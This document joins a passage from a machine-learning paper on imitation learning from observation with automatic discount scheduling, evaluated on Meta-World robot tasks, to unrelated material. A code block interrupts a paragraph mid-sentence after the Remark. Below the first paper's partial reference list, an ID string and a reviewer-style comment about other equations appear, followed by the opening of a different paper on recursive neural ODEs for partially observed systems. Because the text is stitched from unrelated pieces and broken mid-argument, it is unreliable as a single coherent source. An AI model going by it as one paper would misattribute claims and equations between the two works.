As shown in Figure 2(a), when learning the basketball task with a proxy-reward-based method, the agent usually learns a plausible-looking policy that sweeps the ball out of the camera's view and then moves the empty gripper to the basket. Though the agent has not successfully grasped the ball, this policy still maximizes the sum of proxy rewards, since it can advance to states that resemble the expert's demonstrations in subsequent steps by imitating the gripper's moving path without the ball. While converging to this sweeping policy, the agent can also explore behaviors that successfully lift the ball, as shown in Figure 2(b). However, despite picking the ball up, the agent usually fails to move the ball to the basket or quickly drops it in these trajectories. Compared to the sweeping policy, the trajectory in Figure 2(b) receives a higher proxy reward in the initial steps, but a much lower proxy reward in the later steps. These rewards cause an RL agent to estimate a much lower value for lifting the ball in the initial stage than for pushing it away. Thus, when using a standard RL algorithm, the agent will rarely explore picking up the ball and gets stuck in the suboptimal sweeping policy.

In summary, the proxy rewards assigned to the later steps in a trajectory negatively impact the agent's ability to learn the earlier behaviors in the basketball task, which is in line with the observation in Figure 1(b). Similar patterns can be observed in many tasks with progress dependency, which challenges conventional ILfO approaches.

**Remark.** This challenge is closely related to the nature of imitation through proxy rewards. In usual RL tasks with manually designed rewards, the progress dependency property does not challenge the RL algorithm, since the manually designed rewards usually incorporate a characterization of this property. For example, in the basketball task, a handcrafted reward function only assigns positive rewards to states where the ball is grasped.
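To illustrate Eqs. (2)-(4), below is a minimal sketch that computes proxy rewards with an entropy-regularized (Sinkhorn) approximation of the optimal plan, a common practical substitute (Cuturi, 2013) for the exact linear program; the feature inputs and function names are assumptions for illustration.

```python
import numpy as np

def sinkhorn_plan(C, eps=0.05, iters=200):
    """Entropy-regularized transport plan between two uniform marginals (1/T each),
    approximating the minimizer of Eqs. (2)-(3)."""
    T1, T2 = C.shape
    K = np.exp(-C / eps)
    u, v = np.ones(T1) / T1, np.ones(T2) / T2
    for _ in range(iters):
        u = (1.0 / T1) / (K @ v)
        v = (1.0 / T2) / (K.T @ u)
    return u[:, None] * K * v[None, :]

def ot_rewards(agent_feats, expert_feats):
    """Per-step proxy rewards as in Eq. (4): r_i = -sum_j c(o_i, o^e_j) mu*(i, j),
    with a cosine-distance cost over pre-extracted observation features."""
    a = agent_feats / np.linalg.norm(agent_feats, axis=1, keepdims=True)
    e = expert_feats / np.linalg.norm(expert_feats, axis=1, keepdims=True)
    C = 1.0 - a @ e.T                 # cosine-distance cost matrix
    mu = sinkhorn_plan(C)
    return -(C * mu).sum(axis=1)      # one reward per agent step

rewards = ot_rewards(np.random.randn(50, 128), np.random.randn(50, 128))
```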
This assignment naturally eliminates the previously mentioned suboptimal solutions.

4 METHOD

In this paper, we aim to overcome the challenges confronted by traditional proxy-reward-based ILfO algorithms (see Section 2.1) when tackling tasks characterized by the progress dependency property, as discussed in Section 3. In Section 4.1, we illustrate our solution to this challenge and propose a novel framework called ILfO with Automatic Discount Scheduling (ADS). Section 4.2 further elaborates on the design of several challenging components in this framework.

4.1 FRAMEWORK

Recall that in a task with the progress dependency property, rewarding later steps in a trajectory can negatively impact the agent's ability to learn the earlier behaviors. We posit a principle to avoid this problem: if the agent has not mastered the early part of the demonstrated sequences, we should not incorporate imitating the later parts into its current learning objective.

We highlight that setting a lower value for a fundamental term in RL - the discount factor \( \gamma \) - naturally serves as a soft instantiation of this principle. From an RL perspective, a low discount factor prioritizes the rewards obtained in the initial stages of an episode. Specifically, while optimizing the cumulative discounted reward (Equation 1), the reward received at step \( i \) is weighted by \( \gamma^{i-1} \). Therefore, utilizing a low discount factor encourages the agent to focus on optimizing the rewards obtained in early episode steps, which corresponds to imitating the early part of the demonstrations in the context of ILfO. However, an inappropriately low discount factor can make the agent too shortsighted, yielding unsatisfactory behaviors in the late episode steps. It is critical to increase the discount factor once the agent masters the early part of the demonstration, ensuring that the later segments of the demonstrations are also learned sufficiently. To achieve a discount scheduling mechanism that adapts to the distinct properties of various tasks, we propose a novel framework called ILfO with Automatic Discount Scheduling (ADS).

**Algorithm 1** Imitation Learning from Observation with Automatic Discount Scheduling

Require: Expert Demonstrations \( D^e \)
1: Initialize RL agent \( \pi \)
2: Initialize progress recognizer \( \Phi \) with \( D^e \)
3: Initialize discount factor \( \gamma \leftarrow \gamma_0 \)
4: for episode = 1, 2, ⋯ do
5: Sample a trajectory \( \tau = \{o_1, a_1, \cdots, o_T\} \sim \pi \)
6: Compute proxy rewards \( \{r_1, \cdots, r_{T-1}\} \leftarrow f_r(\tau, D^e) \)
7: Update RL agent with the rewarded trajectory \( \{o_1, a_1, r_1, \cdots, o_T\} \)
8: Update progress recognizer \( \Phi \) with \( \tau \)
9: Query \( \Phi \) about the current progress \( k \leftarrow \Phi.\text{CurrentProgress}() \)
10: Update discount factor \( \gamma \leftarrow f_\gamma(k) \)
11: end for

**Training pipeline.** In ADS, we deploy a progress recognizer \( \Phi \) to continuously monitor the agent's learning progress, and dynamically assign a discount factor that positively correlates with the progress. The overall training pipeline is outlined in Algorithm 1. At the start of the training process, the agent is assigned a low discount factor of \( \gamma = \gamma_0 \), which facilitates the agent in mimicking the expert's early behaviors. As the training advances, we periodically consult the progress recognizer \( \Phi \) to track the extent to which the agent has assimilated the expert's behaviors.
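The following is a runnable skeleton of Algorithm 1 with every component stubbed out (the RL learner, which is DrQ-v2 in the paper; the reward labeler \( f_r \); and the recognizer \( \Phi \)), using the mapping \( f_\gamma(k) = \alpha^{1/k} \) introduced in Section 4.2; all class and variable names are illustrative, not the released implementation.

```python
import random

class StubAgent:
    """Placeholder for the RL learner (DrQ-v2 in the paper)."""
    def rollout(self, T=20):
        return [random.random() for _ in range(T)]  # fake observations
    def update(self, traj, rewards, discount):
        pass                                        # RL update elided

class StubRecognizer:
    """Placeholder for the LIS-based progress recognizer of Section 4.2."""
    def __init__(self):
        self.k = 0
    def update(self, traj):
        self.k = min(self.k + 1, 20)                # pretend steady progress
    def current_progress(self):
        return self.k

gamma0, alpha = 0.9, 0.2
agent, recognizer, gamma = StubAgent(), StubRecognizer(), gamma0

for episode in range(100):
    traj = agent.rollout()
    rewards = [0.0] * (len(traj) - 1)               # stands in for f_r(tau, D^e)
    agent.update(traj, rewards, discount=gamma)     # optimize w.r.t. current gamma
    recognizer.update(traj)
    k = recognizer.current_progress()
    if k > 0:
        gamma = alpha ** (1.0 / k)                  # f_gamma(k) = alpha**(1/k)
```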
The function \( \Phi.\text{CurrentProgress}() \) returns an integer \( k \) between 0 and \( T \), indicating that the agent's current policy can follow the expert's behavior in the first \( k \) steps. Once \( k \) is updated, the discount factor \( \gamma \) is updated according to \( f_\gamma(k) \), where \( f_\gamma \) is a monotonically increasing function. Then, the agent continues its trial-and-error loop with the new \( \gamma \). Designing a suitable discount scheduling method, including the progress recognizer \( \Phi \) and the mapping function \( f_\gamma \), is the major challenge in instantiating our framework. We explore these components in Section 4.2.

4.2 Discount Scheduling

**Progress recognizer \( \Phi \).** The progress recognizer \( \Phi \) receives the agent's collected trajectories (line 8 in Algorithm 1) and needs to output the agent's learning progress \( k \) (line 9 in Algorithm 1). To develop this progress recognizer, we first introduce a measurement that evaluates the progress alignment of one trajectory \( \tau = \{o_1, \cdots, o_n\} \) with another trajectory \( \tau' = \{o'_1, \cdots, o'_n\} \). We intend to evaluate how close this pair of trajectories is to forming a monotonic frame-by-frame alignment. To be specific, we consider the sequence \( p = \{p_1, \cdots, p_n\} \), where \( p_i = \arg \min_j c(o_i, o'_j) \) is the index of the nearest neighbor of \( o_i \) in \( \tau' \). If \( \tau \) and \( \tau' \) are exactly the same, then \( p \) is a strictly increasing sequence. On the contrary, if \( \tau \) and \( \tau' \) characterize totally different behaviors, \( p \) becomes a disordered sequence. Following this intuition, we propose to measure the progress alignment between \( \tau \) and \( \tau' \) by the length of the longest increasing subsequence (LIS) of \( p \), denoted by \( \text{LIS}(\tau, \tau') \). The longest increasing subsequence problem chooses a (not necessarily contiguous) subsequence of \( p \) that is strictly increasing (w.r.t. the order in \( p \)) and achieves the longest length. For instance, if \( p = \{1, 2, 4, 2, 6, 5, 7\} \), then its longest increasing subsequences can be \( \{1, 2, 4, 5, 7\} \) or \( \{1, 2, 4, 6, 7\} \). The LIS measurement focuses on the consistency of the trajectories' macroscopic trends, which avoids overfitting to microscopic features of the observed frames.

Now, we utilize this measurement to design the progress recognizer \( \Phi \). \( \Phi \) keeps tracking the agent's learning progress \( k \). Each time \( \Phi \) receives the agent's recently collected trajectory \( \tau \), it considers the first \( k + 1 \) steps of the agent's and the demonstrated trajectories. If the progress alignment between the agent's trajectory and some demonstrated trajectory is comparable to the progress alignment between two demonstrated expert trajectories, then we posit that the agent's current policy can follow the demonstrations in the first \( k \) steps. Specifically, we increase \( k \) by one if the following inequality holds:

\[ \max_{\tau' \in D^e} \text{LIS}(\tau_{1:k+1}, \tau'_{1:k+1}) \geq \lambda \times \min_{\tau'' \neq \tau'} \text{LIS}(\tau'_{1:k+1}, \tau''_{1:k+1}) \] (5)

where the subscript \( 1 : k + 1 \) means extracting the first \( k + 1 \) steps of the trajectory, and \( \lambda \in [0, 1] \) is a hyperparameter that controls the strictness with which we monitor the agent's progress.
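A minimal sketch of this alignment measurement: map each agent frame to its nearest expert frame under the cost \( c \), then score the index sequence with an \( O(n \log n) \) LIS routine; the function names are illustrative.

```python
from bisect import bisect_left

def lis_length(p):
    """Length of the longest strictly increasing subsequence of p
    (patience sorting with binary search)."""
    tails = []
    for x in p:
        i = bisect_left(tails, x)
        if i == len(tails):
            tails.append(x)
        else:
            tails[i] = x
    return len(tails)

def progress_alignment(tau, tau_prime, cost):
    """LIS(tau, tau'): p_i is the index of the nearest neighbor of o_i in tau'."""
    p = [min(range(len(tau_prime)), key=lambda j: cost(o, tau_prime[j]))
         for o in tau]
    return lis_length(p)

print(lis_length([1, 2, 4, 2, 6, 5, 7]))  # 5, matching the example above
```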
**Mapping function \( f_\gamma \).** Taking the progress indicator \( k \) as input, \( f_\gamma \) outputs a new discount factor for the agent. One straightforward way to set \( f_\gamma \) is to make the discount weight of every reward received after step \( k \) no larger than a hyperparameter \( \alpha \in (0, 1) \). Recall that in the RL objective (Eq. 1), the reward received at step \( i \) is weighted by \( \gamma^{i-1} \). Therefore, we propose \( f_\gamma(k) = \alpha^{1/k} \). In Section 5.4, we show that simply setting \( \alpha = 0.2 \) makes our algorithm work well across a variety of tasks.

## 5 EXPERIMENTS

We conduct a series of experiments to evaluate the performance of our approach. We show the performance against baseline methods in Section 5.2, validate the effectiveness of ADS in Section 5.3, and conduct ablation studies in Section 5.4.

### 5.1 EXPERIMENTAL SETUP

**Tasks.** We experiment with 9 challenging tasks from the Meta-World (Yu et al., 2020) suite. Appendix B provides a brief introduction to these tasks.

Figure 3: Evaluation of ILfO methods on 9 Meta-World tasks (2 million environment frames). Each curve reports the mean and standard deviation over 8 random seeds.

**ILfO settings.** The agents are not given any access to the environment's rewards or success/failure signals during training. Instead, the agent is equipped with 10 expert demonstration sequences, which solely comprise observational data. These demonstrations are generated by employing hard-coded policies from Meta-World's open-source codebase and consist of a series of RGB frames. To construct the cost function over this observation space (see Section 2.1), we use the cosine distance over features extracted by a frozen ResNet-50 network (He et al., 2016) pre-trained on the ImageNet (Deng et al., 2009) dataset.

**Baselines.** We compare our approach against three representative ILfO methods, including two proxy-reward-based methods, OT and GAIfO, and one inverse-model-based method, BCO. Detailed descriptions of these methods are deferred to Appendix A.2. To ensure a fair comparison, we equip all the proxy-reward-based methods (OT, GAIfO, and our approach) with the same underlying RL algorithm, DrQ-v2 (Yarats et al., 2021). By default, we equip the baselines with $\gamma = 0.99$.

### 5.2 Main Results

Figure 3 provides a comprehensive comparison between our approach and the baseline methods. To minimize uncertainty and obtain reliable findings, we report the mean and standard deviation over 8 random seeds. In terms of final performance, as measured by task success rate, our method yields superior performance on 7 out of 9 tasks. Additionally, concerning sample efficiency, which refers to the number of online interactions with the environment, our approach shows significant improvements across 8 of the 9 tasks, with the exception being the door-lock task, where all methods exhibit low final success rates. Notably, our approach achieves more substantial performance gains on more challenging tasks, such as basketball and lever-pull, which exhibit pronounced progress dependency properties.

Finally, it is worth emphasizing that ADS serves as a general solution for overcoming the challenges in tasks with progress dependency. Therefore, in addition to its integration with the OT method, ADS can be readily adapted to improve the performance of other ILfO methods. Additional results of applying ADS to the GAIfO method are available in Appendix C.1.
### 5.3 Adaptive Scheduling

Figure 4: Comparing OT+ADS against OT equipped with a fixed discount factor (1 million environment frames).

Figure 5: Comparing OT+ADS against OT equipped with an exponential discount schedule (1 million environment frames). The discount factor for the baselines exponentially increases from 0.9 to 0.99 within 0.5 or 1 million environment frames.

This section delves into the design of discount scheduling. In Figure 4, we compare the performance of ADS with constant discount factors ($\gamma = 0.9, 0.93, 0.96, \text{or } 0.99$) and observe that ADS consistently outperforms all constant discount factors, underscoring the advantages of a dynamic discount schedule. Moreover, Figure 5 contrasts ADS with two manually crafted dynamic discount schedules, which exponentially increase $\gamma$ from 0.9 to 0.99 within 0.5 or 1 million environment frames. We observe that these schedules also generally fall short of ADS's performance due to their inherent lack of adaptability.

Figure 6: Visualization of the discount factor scheduled by our method during the training process.

In Figure 6, we demonstrate how ADS adapts to the unique characteristics of different tasks. In the assembly and basketball tasks, we observe that as the discount factor gradually increases, it reaches a plateau phase where it stabilizes at a constant value. This plateau signifies the task entering a challenging phase demanding extensive exploration. Specifically, in the assembly task, the accurate attachment of the ring to the pillar poses a challenge, while in the basketball task, grasping and lifting the ball is the challenging step. Utilizing ADS ensures that the discount factor remains at an appropriate level, facilitating sufficient exploration and optimization of these challenging stages. Consequently, the agent can effectively acquire the necessary skills during these phases and subsequently advance to learning later expert behaviors.

### 5.4 Ablation Studies

Figure 7: Ablation study on the hyperparameter $\lambda$ in the progress recognizer $\Phi$ (1 million environment frames). $\lambda$ is set to 0.9 by default in our method.

Figure 8: Ablation study on the hyperparameter $\alpha$ in the mapping function $f_\gamma$ (1 million environment frames). $\alpha$ is set to 0.2 by default in our method.

Our ADS method introduced in Section 4.2 involves two hyperparameters: $\lambda$ for the progress recognizer $\Phi$ and $\alpha$ for the mapping function $f_\gamma$. We perform ablations on $\lambda$ and $\alpha$ in Figures 7 and 8, respectively, with results averaged over 8 random seeds. Figure 7 demonstrates that ADS is robust to the value of $\lambda$; it achieves satisfactory performance with values of 0.8, 0.9, and 1.0. Figure 8 illustrates the impact of $\alpha$: smaller $\alpha$ values are more beneficial for tasks whose critical steps come early, e.g., basketball, while larger $\alpha$ values significantly enhance success rates for tasks with challenging later stages, such as assembly. In our main results presented in Section 5.2, we employ $\lambda = 0.9$ and $\alpha = 0.2$.

## 6 RELATED WORK

**Imitation learning from observation.** ILfO (Torabi et al., 2019) asks an agent to learn from observation-only demonstrations. Without expert actions, ILfO presents more challenges than standard imitation learning (Kidambi et al., 2021).
One prevalent line of ILfO algorithms infers proxy rewards from the agent's experiences and the expert demonstrations, and deploys reinforcement learning to optimize the cumulative rewards. The proxy rewards can be derived by matching the agent's and expert's state/trajectory distributions (Torabi et al., 2018b; Yang et al., 2019; Jaegle et al., 2021; Huang et al., 2023; Al-Hafez et al., 2023) or by estimating goal proximity (Lee et al., 2021; Bruce et al., 2022). Among this literature, our work is most related to optimal-transport-based algorithms (Dadashi et al., 2020; Haldar et al., 2023a), which derive proxy rewards by calculating the Wasserstein distance between the agent's and expert's trajectories. Our method is built upon ILfO through proxy rewards, and we choose OT as our basic building block due to its promising performance in complex domains. An alternate strand of the ILfO literature leverages model-based methods. Some approaches train an inverse dynamics model on the agent's collected data, and use this model to infer the expert's missing action information (Nair et al., 2017; Torabi et al., 2018a; Pathak et al., 2018; Radosavovic et al., 2021). Recent work also integrates the inverse dynamics model with proxy-reward-based algorithms (Liu et al., 2022; Ramos et al., 2023). Taking a different approach, Edwards et al. (2019) learn a forward dynamics model on a latent action space. Our automatic discount scheduling framework is orthogonal to these model-based algorithms. It is also possible to leverage model-based components in our framework to further enhance performance. We leave this study as future work.

**Curriculum learning in RL.** Curriculum Learning (CL) (Bengio et al., 2009) is a training strategy in which the learning process is structured to gradually increase the complexity of the training data or tasks, demonstrating its efficacy across a wide range of deep learning applications (Wang et al., 2018; Soviany et al., 2020; Wang et al., 2019; Gu et al., 2022). In RL, existing literature deploys curriculum learning by sorting the collected experiences in the replay buffer (Schaul et al., 2015; Ren et al., 2018), or by training the agent on easier tasks and transferring it to more complex scenarios (Florensa et al., 2017; Silva & Costa, 2018; Dennis et al., 2020; Zhang et al., 2020; Dai et al., 2021; Forestier et al., 2022). Our method requires the agent to first focus on imitating the expert's early behavior, and to progress to later segments after mastering those behaviors. This idea can be treated as an implicit organization of curriculum learning, which differs from the formulations in previous work.

**Discount factor in RL.** Existing literature extensively studies the role of the discount factor in RL. It has been shown that a lower discount factor can: (1) tighten the approximation error bounds when rewards are sparse (Petrik & Scherrer, 2008; Chen et al., 2018); (2) reduce overfitting (Fang et al., 2015); (3) serve as a regularizer and improve performance when data is limited or the data distribution is highly uniform (Amit et al., 2020); (4) be used to learn a series of value functions (Xu et al., 2018; Romoff et al., 2019); (5) achieve pessimism in offline RL (Hu et al., 2022). We propose to use a lower discount factor in a setting different from these works. This idea is motivated by a unique property of imitation through proxy rewards (see Section 4), which does not exist in common RL tasks with manually designed rewards. For discount scheduling, François-Lavet et al.
(2015) suggest progressively increasing the discount factor with a handcrafted schedule during training. In contrast, we propose an automatic discount scheduling mechanism that monitors the agent's learning progress, facilitating adaptability to the distinct properties of various tasks.

7 CONCLUSION

In this paper, we introduce a conceptually simple ILfO framework that is especially effective for tasks characterized by progress dependencies. Our approach requires the agent to initially learn the expert's preceding behaviors before advancing to master subsequent ones. We operationalize this principle by integrating a novel Automatic Discount Scheduling (ADS) mechanism. Through extensive evaluations across 9 Meta-World tasks, we observe remarkable performance improvements when employing our framework. We hope the promising results presented in this paper will inspire the research community to focus more on developing a more general ILfO algorithm. Such an algorithm could leverage a wealth of valuable learning resources on the web, including videos of humans performing various tasks.

REPRODUCIBILITY STATEMENT

With the code released online and the hyperparameter settings in Appendix A.1, the experimental results are highly reproducible. We also utilize sufficient random seeds in Section 5 to ensure reproducibility.

ACKNOWLEDGEMENT

This work is supported by the Ministry of Science and Technology of the People's Republic of China, the 2030 Innovation Megaprojects "Program on New Generation Artificial Intelligence" (Grant No. 2021AAA0150000). This work is also supported by the National Key R&D Program of China (2022ZD0161700).

REFERENCES

Firas Al-Hafez, Davide Tateo, Oleg Arenz, Guoping Zhao, and Jan Peters. LS-IQ: Implicit reward regularization for inverse reinforcement learning. arXiv preprint arXiv:2303.00599, 2023.

Ron Amit, Ron Meir, and Kamil Ciosek. Discount factor as a regularizer in reinforcement learning. In International Conference on Machine Learning, pp. 269–278. PMLR, 2020.

Martin Arjovsky, Soumith Chintala, and Léon Bottou. Wasserstein generative adversarial networks. In International Conference on Machine Learning, pp. 214–223. PMLR, 2017.

Michael Bain and Claude Sammut. A framework for behavioural cloning. In Machine Intelligence 15, pp. 103–129, 1995.

Yoshua Bengio, Jérôme Louradour, Ronan Collobert, and Jason Weston. Curriculum learning. In Proceedings of the 26th Annual International Conference on Machine Learning, pp. 41–48, 2009.

Jake Bruce, Ankit Anand, Bogdan Mazoure, and Rob Fergus. Learning about progress from experts. In The Eleventh International Conference on Learning Representations, 2022.

Yi-Chun Chen, Mykel J Kochenderfer, and Matthijs TJ Spaan. Improving offline value-function approximations for POMDPs by reducing discount factors. In 2018 IEEE/RSJ International Conference on Intelligent Robots and Systems (IROS), pp. 3531–3536. IEEE, 2018.

Marco Cuturi. Sinkhorn distances: Lightspeed computation of optimal transport. Advances in Neural Information Processing Systems, 26, 2013.

Robert Dadashi, Léonard Hussenot, Matthieu Geist, and Olivier Pietquin. Primal Wasserstein imitation learning. arXiv preprint arXiv:2006.04678, 2020.

Shreyansh Daftry, J Andrew Bagnell, and Martial Hebert. Learning transferable policies for monocular reactive MAV control. In 2016 International Symposium on Experimental Robotics, pp. 3–11. Springer, 2017.

Siyu Dai, Andreas Hofmann, and Brian Williams. Automatic curricula via expert demonstrations. arXiv preprint arXiv:2106.09159, 2021.
Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. ImageNet: A large-scale hierarchical image database. In 2009 IEEE Conference on Computer Vision and Pattern Recognition, pp. 248–255. IEEE, 2009.

Michael Dennis, Natasha Jaques, Eugene Vinitsky, Alexandre Bayen, Stuart Russell, Andrew Critch, and Sergey Levine. Emergent complexity and zero-shot transfer via unsupervised environment design. Advances in Neural Information Processing Systems, 33:13049–13061, 2020.

Ashley Edwards, Himanshu Sahni, Yannick Schroecker, and Charles Isbell. Imitating latent policies from observation. In International Conference on Machine Learning, pp. 1755–1763. PMLR, 2019.
O1lR4vSw5x
I don’t see how eqs 14 and 16 are any different from standard neural ODE loss of eq 3. To me this is a reordering of the original simple loss into a more complicated version, which still looks like the same thing. The eqs 17-19 seem to be just gradient updates with Hessians. Ok, but can’t we directly use a second-order optimiser for the standard neural ODE loss?
Recursive Neural Ordinary Differential Equations for Partially Observed Systems

Anonymous authors
Paper under double-blind review

Abstract

Identifying spatiotemporal dynamics is a difficult task, especially in scenarios where latent states are partially observed and/or represent physical quantities. In this context, first-principle ordinary differential equation (ODE) systems are often designed to describe the system's dynamics. In this work, we address the problem of learning parts of the spatiotemporal dynamics with neural networks when only partial information about the system's state is available. Taking inspiration from recursive state estimation and Neural ODEs, we outline a general framework in which complex dynamics generated by differential equations with distinguishable states can be learned in a principled way. We demonstrate the performance of the proposed approach leveraging both numerical simulations and a real dataset extracted from an electro-mechanical positioning system. We show how the underlying equations fit into our formalism and demonstrate the improved performance of the proposed method when compared with standard baselines.

1 Introduction

Ordinary differential equations (ODEs) are used to describe the state evolution of many complex physical systems in engineering, biology, and other fields of natural sciences. Traditionally, first-principle notions are leveraged in designing ODEs as a way to impose physical meaning and interpretability (Psichogios & Ungar, 1992) on latent states. A major issue, however, is the inherent complexity of real-world problems, for which even carefully designed ODE systems cannot account for all aspects of the true underlying physical phenomenon (Karniadakis et al., 2021). Moreover, we often require prediction for systems whose dynamics are not fully understood or are partially unknown (Imbiriba et al., 2022). In this context, Neural ODEs (NODEs) (Chen et al., 2018) emerged as a powerful tool for learning complex correlations directly from the data, where residual neural networks (NNs) are used to parameterize the dynamics of the hidden ODE states. Extensions of NODEs were developed to improve learning speed (Xia et al., 2021; Massaroli et al., 2021) and to learn long-term dependencies in irregularly sampled time series (Xia et al., 2021).

A major challenge in learning NODEs arises when latent states of interest contribute only indirectly to the observations. This is the case when an unobserved state (in the sense that it is not measured) influences an observed state. In this scenario, NODE's standard solutions, which are optimized using the adjoint method (Boltyanskiy et al., 1962), are compromised. Furthermore, NODE systems may have infinitely many solutions since parameters and unobserved states are estimated jointly. As a consequence, even when the model is capable of fitting the data, unobserved states cannot be accurately inferred without incorporating some kind of prior information in the model (Demirkaya et al., 2021). Recently, new hybrid strategies have focused on mixing first-principle models and NODEs to constrain the solution space and obtain meaningful estimates of missing states (Imbiriba et al., 2022; Demirkaya et al., 2021; Ghanem et al., 2021). Despite the lack of a clear formalization, in these works the authors were imposing some kind of distinguishability among states by adding known parts of the dynamics, resulting in hybrid first-principle data-driven models.
Nevertheless, these works focus on state estimation, using data-driven components to improve or augment existing dynamics, but fail to learn global models and do not scale to large parameterized models.

In this paper, we propose a sequential optimization approach that, at each time step, solves an alternating optimization problem for learning system dynamics under partially observed states, when states are distinguishable. The approach focuses on learning unknown dynamics from data where the state related to the unknown dynamics is unobserved. Since the dynamics is unknown, we assume it is described by parametric models such as NNs. The proposed solution leverages the relationship between many recursive state-space estimation procedures and Newton's method (Humpherys et al., 2012) to develop an efficient recursive NODE learning approach capable of sequentially learning states and model parameters. The benefit of the sequential strategy is twofold: (1) it reduces the need for accurate initial conditions during training; (2) it avoids the simultaneous estimation of all states, making second-order optimization methods feasible. Furthermore, the proposed approach exploits the distinguishability of states by designing an alternating optimization strategy with respect to states and parameters. The result is an interconnected sequential optimization procedure, where at each step model parameters and data are used to estimate latent states, and corrected latent states are used to update the model parameters in the current optimization step. This alternating optimization approach improves the optimization of system parameters since it estimates unobserved hidden states and uses them in learning the system parameters. In the case of RNODE, it also prevents vanishing gradients. Moreover, we define distinguishable latent variables and test the proposed Recursive NODE (RNODE) in hybrid scenarios where NNs replace parts of the ODE systems such that the distinguishability of latent variables is preserved. Finally, as a side effect of the adopted recursive paradigm, the proposed strategy can assimilate data and estimate initial conditions by leveraging its sequential state estimation framework over past data.

2 RELATED WORK

2.1 PARTIAL OBSERVATION

In the context of data-driven ODE designs, most learning frameworks assume that all states are observed in the sense that they are directly measured. This assumption does not reflect many real-world scenarios where a subset of the states is unobserved. The GP-SSM is a well-established approach used for dynamical system identification (McHutchon et al., 2015; Ialongo et al., 2019). GP-SSMs can be adapted to the problem of partial measurements by introducing a recognition model that maps outputs to latent states (Eleftheriadis et al., 2017). Nevertheless, these methods do not scale well with large datasets and are limited to small trajectories (Doerr et al., 2018). Indeed, Doerr et al. (2018) mitigate this problem by using stochastic gradient ELBO optimization on minibatches. However, GP-SSM-based methods avoid learning the vector field describing the latent states and instead directly learn a mapping from a history of past inputs and observations to the next observation.
Similar approaches to recognition models have been used for Bayesian extensions of NODEs, where the NODE describes the dynamics of the latent state, while the distributions of the initial latent variable given the observations, and vice versa, are approximated by encoder and decoder networks (Yildiz et al., 2019; Norcliffe et al., 2021). The encoder network, which links observations to latent states by a deterministic mapping or by approximating the conditional distribution, can also be a Recurrent Neural Network (RNN) (Rubanova et al., 2019; Kim et al., 2021; De Brouwer et al., 2019) or an autoencoder (Bakarji et al., 2023). Despite focusing on mapping observations to latent states with neural networks and autoencoders, these works were not demonstrated to learn parameterized models under partial observations. Moreover, this line of work mapping observations to latent states suffers from an indistinguishability problem, since several latent inputs could lead to the same observation. Recently, sparse approaches such as Bakarji et al. (2022) merged encoder networks to identify a parsimonious transformation of the hidden dynamics of partially observed latent states. Moreover, nonlinear observers and recognition models were combined with NODEs to learn dynamic model parameters from partial observations while enforcing physical knowledge in the latent space (Buisson-Fenet et al., 2022). Differently from the aforementioned methods, in this work we propose a recursive alternating approach that uses alternating Newton updates to optimize a quadratic cost function with respect to states and model parameters. Furthermore, the proposed strategy provides a systematic way to estimate initial conditions from historical data.

2.2 SECOND ORDER NEWTON METHOD

Despite the efficiency and popularity of many stochastic gradient descent methods (Robbins & Monro, 1951; Duchi et al., 2011; Hinton et al., 2012; Kingma & Ba, 2014) for optimizing NNs, great efforts have been devoted to exploiting second-order Newton methods, where Hessian information is used to provide faster convergence (Martens & Grosse, 2015; Botev et al., 2017; Gower et al., 2016; Mokhtari & Ribeiro, 2014). When training neural networks, computing the inverse of the Hessian matrix can be extremely expensive (Goldfarb et al., 2020) or even intractable. To mitigate this issue, quasi-Newton methods have been proposed to approximate the Hessian pre-conditioner matrix, such as the Shampoo algorithm (Gupta et al., 2018), which was extended in (Anil et al., 2020) to simplify blocks of the Hessian and used in variational inference second-order approaches (Peirson et al., 2022). Similarly, the works in (Goldfarb et al., 2020; Byrd et al., 2016) focused on developing stochastic quasi-Newton algorithms for problems with large amounts of data. It was shown that the extended Kalman filter can be viewed as a recursive Gauss–Newton method (Bell, 1994; Bertsekas, 1996). Moreover, Newton's method was used to derive recursive estimators for prediction and smoothing (Humpherys et al., 2012). In this paper, we develop a recursive Newton method that mitigates the problem of partial observations of latent states.

3 MODEL AND BACKGROUND

In this section, we describe our modeling assumptions, discuss the distinguishability of latent states, and present the time evolution of the resulting generative model.
3.1 MODEL

In this work, we focus on stochastic differential equations (SDEs) as defined in (Øksendal & Øksendal, 2003) to describe the evolution of system parameters \( \theta(t) \in \mathcal{P} \subset \mathbb{R}^{d_\theta} \), latent states \( x(t) \in \mathcal{X} \subset \mathbb{R}^{d_x} \), and observations (or measurements) \( y(t) \in \mathcal{Y} \subset \mathbb{R}^{d_y} \). The joint process can be described as:
\[
\begin{align*}
\dot{\theta}(t) &= g(\theta(t)) + \nu(t) \\
\dot{x}(t) &= f(x(t), \theta(t), u(t)) + \epsilon(t) \\
y(t) &= h(x(t)) + \zeta(t)
\end{align*}
\]
where \( \nu(t), \epsilon(t) \), and \( \zeta(t) \) are Wiener processes, \( u(t) \in \mathcal{U} \subset \mathbb{R}^{d_u} \) is a vector of external inputs, and the functions \( g : \mathcal{P} \rightarrow \mathcal{P} \), \( f : \mathcal{X} \times \mathcal{P} \times \mathcal{U} \rightarrow \mathcal{X} \), and \( h : \mathcal{X} \rightarrow \mathcal{Y} \) describe the parameter, latent, and observation processes, respectively. To describe the evolution of the system parameters \( \theta(t) \) and latent states \( x(t) \), we consider the process in equation 1 to be a first-order Markov process evolving over time \( t \).

The partial observation problem: Ideally, the states \( x(t) \) would be directly observed and thus appear as elements of \( y(t) \). In practice, some of these states may influence \( y(t) \) only indirectly by acting on other, measurable states. That is when classical training fails. In this work, we are interested in learning the unknown dynamics governing unobserved states. Note that this scenario poses further challenges to the estimation process, since the recovery of latent states can be compromised.

3.2 DISTINGUISHABILITY OF NONLINEAR SYSTEMS

The task of recovering latent states \( x(t) \) from a sequence of observations and inputs \( \mathcal{D}_N \triangleq \{u(0), y(0), \ldots, u(N - 1), y(N - 1)\} \) rests on our ability to distinguish two observations \( h(x(t_a)) \) and \( h(x(t_b)) \) from one another.

**Definition 3.1** We say that a pair of latent variables \( x(t_a) \) and \( x(t_b) \) is distinguishable with respect to a control sequence \( u(t) \in \mathcal{U} \subset \mathbb{R}^{d_u} \) if
\[
h(x(t_a)) \neq h(x(t_b)) \quad \forall x(t_a) \neq x(t_b).
\]
Otherwise, we say that the pair is indistinguishable with respect to \( u(t) \).

